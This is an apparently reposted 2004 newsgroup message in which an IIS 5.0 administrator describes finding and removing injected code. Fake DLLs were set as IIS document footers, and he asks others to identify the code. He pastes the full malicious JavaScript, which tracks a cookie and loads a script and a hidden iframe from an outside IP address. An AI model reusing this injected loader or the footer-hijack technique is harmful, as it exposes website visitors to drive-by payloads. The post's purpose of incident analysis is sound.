QODS ec

Saturday, June 26, 2004

SEC: Russian IIS hack? Malicious Javascript code

microsoft.public.inetserver.iis.security: Russian IIS hack? Malicious Javascript code

Russian IIS hack? Malicious Javascript code

From: Oca Hoeflein (Hoeflein_at_discussions.microsoft.com)
Date: 06/23/04

* Next message: Paul Lynch: "Re: Russian IIS hack? Malicious Javascript code"
* Previous message: Paul Lynch: "Re: Virtual Directory Security & VBScript FileSystemObject"
* Next in thread: Paul Lynch: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Paul Lynch: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Geoff Lane: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: dh: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Ken: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: LPD: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: srock: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Marc Krueger: "Russian IIS hack? Malicious Javascript code"
* Reply: Patrick: "RE: Russian IIS hack? Malicious Javascript code"
* Reply: Lucas: "Re: Russian IIS hack? Malicious Javascript code"
* Reply: Lucas: "Russian IIS hack? Malicious Javascript code"
* Maybe reply: Wes Carberry: "Re: Russian IIS hack? Malicious Javascript code"
* Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 22 Jun 2004 17:42:01 -0700


I successfully removed some malicious code from my IIS 5.0 server that may not have had all it's patches updated, but I cannot find any information on this malicious code that redirected on a random basis the users of my websites to a russian website that appeared to be down. to a domain called balamut.com
with an IP address of 217.107.218.147 which RDNS to
unassigned.m10-msk-ru.e-neverland.net

The javascript code lived in some fake dll files in the inetsrv folder.
One fake .dll file was created for each web on my server and in the IIS metabase the defaultdocfooter was set to each of the dll files and enabledocfooter was set to true.

the offending code was embedded in every file that the website delivered and pages that had embedded .js files the javascript for those pages would not function.

I have posted the offending code, mabye someone can identify this?

As proof check out a google search for one of the function in the code okx12()

you'll see the first link it returns is an RTF if you view the html version you'll see this code appended to the bottom of the page.

< script language="JavaScript" >< !--
var qxco7=document.cookie;function gc099(n21){var ix=qxco7.indexOf(n21+"=");if(ix==-1)return null;ix=qxco7.indexOf("=",ix)+1;var es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new Date();var expiry=new Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie;}function okx12(){window.status="";setTimeout("okx12()", 200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){document.write("< script language=\"JavaScript\" src=\"http://217.107.218.147/dot.php\" >< /script >< iframe src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");sc088("trk716","4");}}// -->< /script >

0 Comments:

Post a Comment

<< Home


Get Firefox!